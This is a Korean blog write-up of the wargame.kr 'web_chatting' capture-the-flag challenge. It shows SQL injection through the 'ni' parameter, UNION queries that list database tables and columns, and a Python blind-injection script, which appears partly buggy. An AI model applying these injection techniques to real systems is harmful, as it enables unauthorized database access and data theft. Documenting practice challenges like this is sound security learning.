로그인하면 채팅 페이지가 뜬다
소스를 보면
ni값을 확인해서 tni와 ni값이 다르면 chatview.php에 접근하는데
http://wargame.kr:8080/web_chatting/chatview.php?t=1&ni=1로 들어가보면
chatting기록들이 뜬다.
ni로 sql injection이 가능한데
처음에 blind sql injection인줄 알고 엄청 돌리다가 (되긴함)
돌리면서 union 넣어봣는데 됨..
가장 아래에 그 결과가 뜬다.
칼럼수 5개 맞춰주고
select table_name,1,2,3,4 from information_schema.tables;
select column_name,1,2,3,4 from information_schema.columns
select (column) from (table )
삽질했던
*** blind injection code
import http.client import string from urllib import parse def blind(q): con=http.client.HTTPConnection('wargame.kr:8080') head={'Cookie':'chat_id=admin&ci_session='} q=parse.quote(q) con.request('GET','/web_chatting/chatview.php?t=1&ni=if('+q+',1,@)',headers=head) res=con.getresponse().read() #print(res) return b'111111111111111' in res print(blind('1=1')) table_length=[] i=1 while(1): if not blind('(select length(table_name) from information_schema.tables limit {},1)>0'.format(i)): break for j in range(1,11): if blind('(select length(table_name) from information_schema.tables limit {},1)={}'.format(i,j)): table_length.append(j) print(j) break i+=1 print(table_length) table_name=[] arr='0123456789'+string.ascii_letters for i in range(len(table_length)): arr='' for j in range(table_length[i]): for a in arr: if blind('(select ascii(substring(table_name,{},1)) from information_schema.tables limit {},1)={}'.format(j,i,ord(a))): arr+=a table_name.append(arr) print(table_name)
'war game > wargame.kr' 카테고리의 다른 글
| [wargame.kr]lonely_guys (0) | 2017.03.02 |
|---|---|
| [wargame.kr]dmbs335 (0) | 2017.02.25 |
| [wargame.kr]simple board (0) | 2017.02.24 |
| [wargame.kr]md5_password (0) | 2017.02.24 |
| [wargame.kr]dun_worry_about_the_vase - oracle padding attack (0) | 2017.02.20 |